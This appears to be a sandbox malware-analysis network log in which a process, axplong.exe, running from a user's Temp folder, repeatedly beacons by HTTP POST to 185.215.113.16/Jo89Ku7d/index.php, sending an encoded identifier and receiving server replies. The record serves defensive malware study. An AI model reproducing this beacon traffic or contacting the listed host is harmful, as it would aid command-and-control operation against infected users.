Sep 27, 2024 05:53:20.858191013 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:21.099672079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:21.218667984 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:21.977622986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:21.979022980 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:22.209462881 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:22.330441952 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:23.089411020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:23.090346098 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:23.333048105 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:23.521847963 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:24.494335890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:24.495405912 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:24.753993988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:24.872675896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:25.563750982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:25.564929962 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:25.786482096 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:25.905311108 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:26.603712082 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:26.605684042 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:26.829114914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:26.950301886 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:27.685352087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:27.686184883 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:27.967570066 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:28.075129986 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:28.784866095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:28.785811901 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:29.012288094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:29.134426117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:29.860305071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:29.862093925 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:30.104621887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:30.218231916 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:30.918351889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:30.919238091 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:31.143484116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:31.264282942 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:31.983756065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:32.005872011 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:32.301059961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:32.426239967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:33.119906902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:33.120877981 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:33.343898058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:53:33.468365908 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:53:34.187731981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:53:34.188659906 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:53:34.419847012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
